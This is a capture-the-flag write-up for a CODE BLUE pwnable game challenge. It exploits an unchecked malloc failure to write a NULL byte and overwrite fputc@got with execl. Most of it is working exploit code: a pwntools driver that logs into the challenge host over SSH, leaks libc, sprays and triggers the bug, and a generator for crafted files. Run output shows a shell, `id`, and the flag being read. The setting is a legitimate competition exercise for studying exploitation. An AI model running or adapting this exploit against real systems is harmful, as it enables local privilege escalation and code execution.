Category: pwnable
Summary: feed the game a very large file so that `malloc(size+1)` fails and returns NULL; the unchecked `ptr[size] = '\x00';` that follows then writes a single zero byte at address `0 + size` (`ptr = 0`, `size = 0x0804xxxx`). With the file size chosen as `0x0804b069` — the value create.py annotates as `fputc@got` — that is one controlled NULL-byte write into the binary's mapping.
First blood and the only solve, after a long time! A fuller explanation will be added later.
ex.py — exploit driver, run locally with pwntools (Python 2):
#!/usr/bin/python
from pwn import *
import re
ssh_ = ssh(host = 'pwn2.task.ctf.codeblue.jp', password = 'lets_play' , user= 'game_chal')
ssh2_ = ssh(host = 'pwn2.task.ctf.codeblue.jp', password = 'lets_play' , user= 'game_chal')
s2 = ssh2_.process('/bin/sh', env={'PS1':''})
s2.sendline('cd /tmp/wwwwpp/')
s2.sendline('''ln -s setregid_sh `python -c 'print "\xb0\x1d\x1b"'`''')
while 1:
s = ssh_.process('/bin/sh', env={'PS1':''})
s.sendline('cd /tmp/wwwwpp/')
s.sendline('ulimit -c 1024')
s.sendline('/home/p11454/game')
# card game for memory leak
s.recvuntil('3. Exit')
s.sendline('2')
# scanf("%u %u", ...) failed
s.recvuntil('Input the coordinate of the 1st card to open\n')
s.sendline('a b')
s.recvuntil('Input the coordinate of the 2nd card to open\n')
stack, libc_base = map(int, re.findall('\((\d+), (\d+)\)', s.recvline().strip())[0])
#libc_base = libc_base - 0x1d0030
libc_base = libc_base - 0x1d6010
# last 2bytes of libc base must be 0xc000if (libc_base & 0xf000) != 0xc000:
s.close()
continue
execl_libc = libc_base + 0xB0A80
print 'libc_base :', hex(libc_base)
print 'execl@libc : ', hex(execl_libc)
s2.sendline('python create.py {}'.format(hex(execl_libc)))
s2.recvuntil('done')
# spray ...
for i in range(0, 20):
print i
s.recvuntil('3. Exit\n')
s.sendline('1')
s.recvuntil('Can you answer all the questions correctly?')
s.recvuntil('Q. ')
s.sendline('a')
s.recvuntil('Wrong.')
s.recvuntil('3. Exit\n')
s.sendline('1')
s.recvuntil('Can you answer all the questions correctly?')
for i in range(0, 5):
print i
s.recvuntil('Q. ')
s.sendline('u\x00')
s.recvuntil('Correct!')
print 'trigger!'
s.interactive()
create.py — file generator, uploaded to and run on the target by ex.py:
#!/usr/bin/python
import sys
from struct import pack
p32 = lambda x : pack("<L", x)
if len(sys.argv) != 2:
exit(-1)
def create_sample(fname, data, length):
with open(fname, 'wb') as f:
i = length % 0x1000 if length % 0x1000 else 0x1000
f.write('a\nu\x00'+(data*((i-4)/len(data))))
while i < length:
f.write((data * (0x1000 / len(data))))
i += 0x1000
create_sample('youlose', 'a', 0x8000000)
create_sample('banner', 'a', 0x0804b069) # fputc@got
with open('flag', 'wb') as f:
f.write('hello\nbye\n')
value = int(sys.argv[1], 16)
for i in range(1, 11):
create_sample('quiz%02d' % i, p32(value), 0x8000000)
print 'done'
Exploit!
$ python ex.py
[+] Connecting to pwn2.task.ctf.codeblue.jp on port 22: Done
[!] Couldn't check security settings on 'pwn2.task.ctf.codeblue.jp'
[+] Connecting to pwn2.task.ctf.codeblue.jp on port 22: Done
[+] Starting remote process '/bin/sh' on pwn2.task.ctf.codeblue.jp: pid 16527
[+] Starting remote process '/bin/sh' on pwn2.task.ctf.codeblue.jp: pid 16533
[*] Stopped remote process 'dash' on pwn2.task.ctf.codeblue.jp (pid 16533)
..........................
[+] Starting remote process '/bin/sh' on pwn2.task.ctf.codeblue.jp: pid 16672
[*] Stopped remote process 'dash' on pwn2.task.ctf.codeblue.jp (pid 16672)
[+] Starting remote process '/bin/sh' on pwn2.task.ctf.codeblue.jp: pid 16677
[*] Stopped remote process 'dash' on pwn2.task.ctf.codeblue.jp (pid 16677)
[+] Starting remote process '/bin/sh' on pwn2.task.ctf.codeblue.jp: pid 16682
[*] Stopped remote process 'dash' on pwn2.task.ctf.codeblue.jp (pid 16682)
[+] Starting remote process '/bin/sh' on pwn2.task.ctf.codeblue.jp: pid 16687
libc_base : 0xf75fc000
execl@libc : 0xf76aca80
0
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
0
1
2
3
4
trigger!
[*] Switching to interactive mode
(null)Q. hello
> $
Wrong.
$ id
uid=33433(game_chal) gid=11454(p11454) groups=11454(p11454),33433(game_chal)
$ cat /home/p11454/actual_flag
CBCTF{Natural vulnerability in a miniature garden}
Flag : CBCTF{Natural vulnerability in a miniature garden}